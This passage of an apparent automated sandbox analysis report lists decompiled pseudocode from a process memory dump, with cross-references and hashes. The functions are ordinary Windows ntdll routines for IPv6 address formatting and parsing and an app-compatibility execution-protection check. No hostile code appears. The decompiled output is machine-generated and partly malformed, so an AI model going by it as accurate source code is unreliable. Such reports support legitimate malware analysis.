                                                              0x020388c5
                                                              0x020388ce
                                                              0x020388e0
                                                              0x020388e5
                                                              0x020388e8
                                                              0x020388e8
                                                              0x020388ee
                                                              0x02038900
                                                              0x02038900
                                                              0x02038905
                                                              0x00000000
                                                              0x02038905

                                                              APIs
                                                              Strings
                                                              • Kernel-MUI-Language-SKU, xrefs: 020389FC
                                                              • Kernel-MUI-Language-Allowed, xrefs: 02038827
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 02038914
                                                              • WindowsExcludedProcs, xrefs: 020387C1
                                                              • Kernel-MUI-Number-Allowed, xrefs: 020387E6
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: _wcspbrk
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 402402107-258546922
                                                              • Opcode ID: 220af9dffb8b71e02ea1044d4038cb14ad62283b91d6ac558327d92ba2d25c9d
                                                              • Instruction ID: d3fa861c5e0989116f3b5c90b61432265d8531d3a5d1d95dbe3b97c12f747737
                                                              • Opcode Fuzzy Hash: 220af9dffb8b71e02ea1044d4038cb14ad62283b91d6ac558327d92ba2d25c9d
                                                              • Instruction Fuzzy Hash: C6F1D8B2D00309EFDB52EF95C9849EEB7B9FF08304F1484AAE505A7610E7359A45EF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 020513CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 38%
                                                              			E020513CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02047707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2012926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02047707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2019cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02047707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02047707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02047707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02047707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                              0x020513d5
                                                              0x020513d9
                                                              0x020513dc
                                                              0x020513de
                                                              0x020513e1
                                                              0x020513e8
                                                              0x020513ee
                                                              0x0207e8fd
                                                              0x00000000
                                                              0x0207e921
                                                              0x0207e921
                                                              0x0207e928
                                                              0x0207e982
                                                              0x0207e98a
                                                              0x00000000
                                                              0x0207e99a
                                                              0x0207e99e
                                                              0x0207e9a3
                                                              0x0207e9a8
                                                              0x0207e9b9
                                                              0x0207e978
                                                              0x00000000
                                                              0x0207e978
                                                              0x0207e98a
                                                              0x0207e92a
                                                              0x0207e931
                                                              0x0207e944
                                                              0x0207e944
                                                              0x0207e950
                                                              0x0207e954
                                                              0x0207e959
                                                              0x0207e95e
                                                              0x0207e963
                                                              0x0207e970
                                                              0x00000000
                                                              0x0207e975
                                                              0x0207e93b
                                                              0x0207e980
                                                              0x00000000
                                                              0x0207e980
                                                              0x0207e942
                                                              0x0207e94b
                                                              0x00000000
                                                              0x0207e94b
                                                              0x00000000
                                                              0x0207e942
                                                              0x020513f4
                                                              0x020513f4
                                                              0x020513f9
                                                              0x020513fc
                                                              0x020513ff
                                                              0x02051406
                                                              0x0207e9cc
                                                              0x0207e9d2
                                                              0x0207e9d2
                                                              0x0207e9cc
                                                              0x0205140c
                                                              0x02051411
                                                              0x02051431
                                                              0x0205143a
                                                              0x0205143c
                                                              0x0205143f
                                                              0x0205143f
                                                              0x02051442
                                                              0x02051447
                                                              0x020514a8
                                                              0x020514ac
                                                              0x0207e9e2
                                                              0x0207e9e7
                                                              0x0207e9ec
                                                              0x0207ea05
                                                              0x0207ea05
                                                              0x00000000
                                                              0x02051449
                                                              0x00000000
                                                              0x02051449
                                                              0x0205144c
                                                              0x02051459
                                                              0x02051462
                                                              0x02051469
                                                              0x0205146a
                                                              0x02051470
                                                              0x02051473
                                                              0x02051476
                                                              0x02051476
                                                              0x02051490
                                                              0x02051495
                                                              0x0205138e
                                                              0x02051390
                                                              0x02051397
                                                              0x02051398
                                                              0x02051399
                                                              0x020513a1
                                                              0x020513a4
                                                              0x020513a4
                                                              0x02051498
                                                              0x0205149c
                                                              0x0205149f
                                                              0x020514a2
                                                              0x00000000
                                                              0x00000000
                                                              0x020514a4
                                                              0x00000000
                                                              0x020514a4
                                                              0x02051413
                                                              0x02051415
                                                              0x02051416
                                                              0x02051419
                                                              0x0205141c
                                                              0x02051422
                                                              0x020513b7
                                                              0x020513bc
                                                              0x020513bf
                                                              0x020513bf
                                                              0x020513c2
                                                              0x02051424
                                                              0x02051424
                                                              0x02051424
                                                              0x02051427
                                                              0x0205142b
                                                              0x0205142c
                                                              0x0205142c
                                                              0x0205142c
                                                              0x00000000
                                                              0x0205141c
                                                              0x02051411

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: c06d7c27a27a8f641a57613f46af04256d82f6cf885b58f8ba79e3ad825a4c81
                                                              • Instruction ID: 97722e717ae53d560ea444c639343a0f6ac596132ee6a1584e1933865dbe5e22
                                                              • Opcode Fuzzy Hash: c06d7c27a27a8f641a57613f46af04256d82f6cf885b58f8ba79e3ad825a4c81
                                                              • Instruction Fuzzy Hash: 0F6111B1D00765AACF25CF59C890ABFBBF6EF84300B54C06DE89A47540D734A640EF60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02047EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 64%
                                                              			E02047EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x20f2088; // 0x761d41cf
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02047F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02063F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0201DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x20f4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02063F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02020D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02063F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02028375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02063F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0208E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02063F92();
					_t38 = 1;
					L2:
					return E0201E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                              0x02047f08
                                                              0x02047f0f
                                                              0x02047f12
                                                              0x02047f1b
                                                              0x02047f31
                                                              0x02063ead
                                                              0x02063eb4
                                                              0x00000000
                                                              0x00000000
                                                              0x02063eba
                                                              0x02063ecd
                                                              0x02063ed2
                                                              0x02063ee1
                                                              0x02063ee7
                                                              0x02063eec
                                                              0x02063f12
                                                              0x02063f18
                                                              0x02063f1a
                                                              0x00000000
                                                              0x00000000
                                                              0x02063f20
                                                              0x02063f26
                                                              0x02063f28
                                                              0x00000000
                                                              0x00000000
                                                              0x02063f2e
                                                              0x02063f30
                                                              0x00000000
                                                              0x00000000
                                                              0x02063f3a
                                                              0x02063f3b
                                                              0x02063f53
                                                              0x02063f64
                                                              0x02063f69
                                                              0x02063f6c
                                                              0x02063f6d
                                                              0x02063f6f
                                                              0x0206e304
                                                              0x0206e30f
                                                              0x0206e315
                                                              0x0206e31e
                                                              0x0206e321
                                                              0x0206e327
                                                              0x0206e329
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0206e32f
                                                              0x0206e32f
                                                              0x0206e337
                                                              0x0206e33a
                                                              0x0206e33b
                                                              0x0206e33d
                                                              0x0206e33f
                                                              0x0206e341
                                                              0x0206e341
                                                              0x0206e34e
                                                              0x0206e353
                                                              0x0206e358
                                                              0x0206e35d
                                                              0x0206e35f
                                                              0x00000000
                                                              0x00000000
                                                              0x0206e365
                                                              0x0206e365
                                                              0x0206e368
                                                              0x0206e36e
                                                              0x00000000
                                                              0x00000000
                                                              0x0206e374
                                                              0x0206e32f
                                                              0x02063f75
                                                              0x02063f7a
                                                              0x02063f7c
                                                              0x02063f7e
                                                              0x02063f86
                                                              0x02047f39
                                                              0x02047f47
                                                              0x02047f47
                                                              0x02047f37
                                                              0x02047f37
                                                              0x00000000

                                                              APIs
                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02063F12
                                                              Strings
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02063F75
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 0206E345
                                                              • ExecuteOptions, xrefs: 02063F04
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02063EC4
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02063F4A
                                                              • Execute=1, xrefs: 02063F5E
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0206E2FB
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: BaseDataModuleQuery
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 3901378454-484625025
                                                              • Opcode ID: 851debc423b6fc4c1e14590dbde3c9847f005ebe1cba7aaef5bde6aed9561a75
                                                              • Instruction ID: fbec9f60c3235ad1c63b8beb6ac3a45ecc0f40cfa0e4cbd0b4e94f342935b9d5
                                                              • Opcode Fuzzy Hash: 851debc423b6fc4c1e14590dbde3c9847f005ebe1cba7aaef5bde6aed9561a75
                                                              • Instruction Fuzzy Hash: 5141DA7168071C7EEB21DB94DCC9FEBB3FDAF14704F0045A9A905E6090EB709A45AFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02050B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E02050B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02028980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0201DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02050CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02050CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E020506BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E020506BA(_t135, _t178) == 0 || E02050A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02050CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02050CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E020506BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E020506BA(_t124, _t142) == 0 || E02050A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                              0x02050b21
                                                              0x02050b24
                                                              0x02050b27
                                                              0x02050b2a
                                                              0x02050b2d
                                                              0x02050b30
                                                              0x02050b33
                                                              0x02050b36
                                                              0x02050b39
                                                              0x02050b3e
                                                              0x02050c65
                                                              0x02050c68
                                                              0x02050c6a
                                                              0x02050c6f
                                                              0x0207eb42
                                                              0x00000000
                                                              0x00000000
                                                              0x0207eb48
                                                              0x0207eb48
                                                              0x02050c75
                                                              0x02050c7a
                                                              0x0207eb54
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0207eb5a
                                                              0x02050c80
                                                              0x02050c84
                                                              0x0207eb98
                                                              0x00000000
                                                              0x00000000
                                                              0x0207eba6
                                                              0x02050cb8
                                                              0x02050cba
                                                              0x02050cd3
                                                              0x02050cda
                                                              0x02050ce4
                                                              0x02050ce9
                                                              0x00000000
                                                              0x02050cec
                                                              0x02050c8c
                                                              0x0207eb63
                                                              0x00000000
                                                              0x00000000
                                                              0x0207eb70
                                                              0x0207eb75
                                                              0x0207eb7d
                                                              0x00000000
                                                              0x00000000
                                                              0x0207eb8c
                                                              0x00000000
                                                              0x0207eb8c
                                                              0x02050c96
                                                              0x00000000
                                                              0x00000000
                                                              0x02050ca2
                                                              0x02050cac
                                                              0x02050cb4
                                                              0x00000000
                                                              0x00000000
                                                              0x02050b44
                                                              0x02050b47
                                                              0x02050b49
                                                              0x00000000
                                                              0x00000000
                                                              0x02050b4f
                                                              0x02050b50
                                                              0x00000000
                                                              0x00000000
                                                              0x02050b56
                                                              0x02050b62
                                                              0x02050b7c
                                                              0x02050bac
                                                              0x02050a0f
                                                              0x0207eaaa
                                                              0x00000000
                                                              0x0207eac4
                                                              0x0207eac4
                                                              0x02050bd0
                                                              0x02050bd0
                                                              0x02050bd4
                                                              0x02050bd9
                                                              0x00000000
                                                              0x00000000
                                                              0x02050bdb
                                                              0x02050be0
                                                              0x0207eb0e
                                                              0x02050a1a
                                                              0x00000000
                                                              0x02050a1a
                                                              0x0207eb1a
                                                              0x0207eb1f
                                                              0x0207eb27
                                                              0x00000000
                                                              0x00000000
                                                              0x0207eb36
                                                              0x00000000
                                                              0x0207eb36
                                                              0x02050bea
                                                              0x00000000
                                                              0x00000000
                                                              0x02050bf6
                                                              0x02050c00
                                                              0x02050c03
                                                              0x02050c0b
                                                              0x00000000
                                                              0x02050c0b
                                                              0x0207eaaa
                                                              0x00000000
                                                              0x02050a15
                                                              0x02050bb6
                                                              0x00000000
                                                              0x02050bc6
                                                              0x02050bc6
                                                              0x02050bcb
                                                              0x02050c15
                                                              0x00000000
                                                              0x00000000
                                                              0x02050c1d
                                                              0x02050c20
                                                              0x02050c21
                                                              0x02050c24
                                                              0x02050c24
                                                              0x02050c26
                                                              0x00000000
                                                              0x02050c26
                                                              0x02050bcd
                                                              0x00000000
                                                              0x02050bcd
                                                              0x02050b89
                                                              0x02050b89
                                                              0x02050b90
                                                              0x00000000
                                                              0x00000000
                                                              0x02050b96
                                                              0x00000000
                                                              0x02050b96
                                                              0x02050a04
                                                              0x02050a04
                                                              0x02050b9a
                                                              0x02050b9a
                                                              0x02050b9b
                                                              0x02050b9f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x02050ba5
                                                              0x02050ac7
                                                              0x02050aca
                                                              0x0207eacf
                                                              0x00000000
                                                              0x0207eade
                                                              0x0207eade
                                                              0x0207eae3
                                                              0x00000000
                                                              0x00000000
                                                              0x0207eaf3
                                                              0x0207eaf6
                                                              0x0207eaf7
                                                              0x0207eafe
                                                              0x0207eb01
                                                              0x00000000
                                                              0x0207eb01
                                                              0x0207eacf
                                                              0x02050ad0
                                                              0x02050ad4
                                                              0x00000000
                                                              0x00000000
                                                              0x02050ada
                                                              0x02050ae6
                                                              0x02050c34
                                                              0x00000000
                                                              0x02050c47
                                                              0x02050c49
                                                              0x02050c4a
                                                              0x02050c4e
                                                              0x02050c51
                                                              0x02050c54
                                                              0x02050c57
                                                              0x02050c5a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x02050c60
                                                              0x02050afb
                                                              0x02050afe
                                                              0x02050b02
                                                              0x02050b05
                                                              0x02050b08
                                                              0x00000000
                                                              0x02050b08
                                                              0x02050ae6
                                                              0x02050b44
                                                              0x020509f8
                                                              0x020509f8
                                                              0x020509f9
                                                              0x00000000
                                                              0x00000000
                                                              0x0207eaa0
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID: .$:$:
                                                              • API String ID: 3965848254-2308638275
                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction ID: f01f02f70b863c509f7ab78ba7f7ba549171597fba48b5002b4255e202c7c373
                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction Fuzzy Hash: 93A17C71D0032AEADF65CF68C8447AFBBF6AF0A308F24846ADC42A7241D7319645EB55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02050554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 50%
                                                              			E02050554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
